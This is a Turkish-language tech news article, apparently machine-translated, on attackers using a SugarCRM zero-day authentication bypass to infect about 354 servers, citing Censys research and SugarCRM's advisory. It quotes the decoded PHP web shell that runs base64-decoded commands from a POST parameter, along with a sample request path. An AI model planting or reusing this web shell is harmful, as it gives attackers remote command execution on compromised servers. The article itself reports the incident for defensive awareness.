Cumartesi, Aralık 14, 2024
Ana SayfaTeknoloji HaberleriYüzlerce SugarCRM sunucusuna kritik açıklardan yararlanma bulaştı

Yüzlerce SugarCRM sunucusuna kritik açıklardan yararlanma bulaştı

Monitör okumasında bilgisayar korsanlığı mesajına bakan bir kişinin çekimi

Son iki haftadır bilgisayar korsanları, kullanıcılara sunucuları üzerinde tam kontrol sağlayan kötü amaçlı yazılım bulaştırmak için SugarCRM (müşteri ilişkileri yönetimi) sistemindeki kritik bir güvenlik açığından yararlanıyor.

Güvenlik açığı, yararlanma kodunun Aralık ayı sonlarında çevrimiçi olarak yayınlanmasıyla sıfır gün olarak başladı. Açıktan yararlanmayı yayınlayan kişi, bunu uzaktan kod yürütmeyle bir kimlik doğrulama atlaması olarak tanımladı; bu, bir saldırganın güvenlik açığı bulunan sunucularda hiçbir kimlik bilgisi gerekmeden kötü amaçlı kod çalıştırmak için kullanabileceği anlamına geliyor. SugarCRM o zamandan beri bu açıklamayı doğrulayan bir danışma belgesi yayınladı. İstismar gönderisi ayrıca, insanların İnternet’teki savunmasız sunucuları bulmak için yapabileceği basit web aramaları olan çeşitli “aptalları” da içeriyordu.

Ağ izleme hizmeti Censys’de kıdemli güvenlik araştırmacısı olan Mark Ellzey, bir e-postada 11 Ocak itibariyle şirketin sıfır gün kullanılarak virüs bulaşmış 354 SugarCRM sunucusu tespit ettiğini söyledi. Bu, Censys’in tespit ettiği toplam 3.059 SugarCRM sunucusunun yüzde 12’sine yakındır. Geçen hafta itibariyle, enfeksiyonlar 90 ile ABD’de en yüksekti, onu Almanya, Avustralya ve Fransa izledi. Salı günü yapılan bir güncellemede Censys, enfeksiyon sayısının orijinal gönderiden bu yana pek artmadığını söyledi.

SugarCRM’nin 5 Ocak’ta yayınlanan danışma belgesi, düzeltmeleri kullanıma sundu ve bulut tabanlı hizmetine çoktan uygulandığını söyledi. Ayrıca, SugarCloud veya SugarCRM tarafından yönetilen barındırma dışında çalışan örnekleri olan kullanıcılara düzeltmeleri yüklemelerini tavsiye etti. Danışma belgesi, güvenlik açığının Sugar Sell, Serve, Enterprise, Professional ve Ultimate yazılım çözümlerini etkilediğini söyledi. Sugar Market yazılımını etkilemedi.

Censys’in söylediğine göre kimlik doğrulama atlaması, /index.php/ dizin. “Kimlik doğrulama atlaması başarılı olduktan sonra, hizmetten bir tanımlama bilgisi alınır ve ‘/cache/images/sweet.phar’ yoluna ikinci bir POST isteği gönderilir ve bu istek, PHP kodunu içeren küçük bir PNG kodlu dosya yükler. dosya için başka bir istek yapıldığında sunucu tarafından yürütülür,” diye ekledi şirket araştırmacıları.

İkili, hexdump yazılımı kullanılarak analiz edildiğinde ve kodu çözüldüğünde, PHP kodu kabaca şu anlama gelir:

〈?php
echo “#####”;
passthru(base64_decode($_POST[“c”]));
echo “#####”;
?〉

“Bu, ‘c’nin base64 kodlu sorgu bağımsız değişken değerine dayalı olarak komutları yürütecek basit bir web kabuğudur (örneğin, ‘POST /cache/images/sweet.phar?c=”L2Jpbi9pZA==” HTTP/1.1’, “/bin/id” komutunu web hizmetini çalıştıran kullanıcı kimliğiyle aynı izinlerle yürütecek),” gönderi açıkladı.

Bir web kabuğu, saldırganların güvenliği ihlal edilmiş cihazlarda kendi seçtikleri komutları veya kodları çalıştırmak için bir arayüz olarak kullanabilecekleri metin tabanlı bir pencere sağlar. Censys’ten Ellzey, şirketin saldırganların mermileri tam olarak ne için kullandığını göremediğini söyledi.

Hem Censys hem de SugarCRM tavsiyeleri, SugarCRM müşterilerinin hedef alınıp alınmadığını belirlemek için kullanabilecekleri uzlaşma göstergeleri sağlar. Güvenlik açığı bulunan ürünlerin kullanıcıları, düzeltmeleri mümkün olan en kısa sürede araştırmalı ve yüklemelidir.

RELATED ARTICLES

Popüler Konular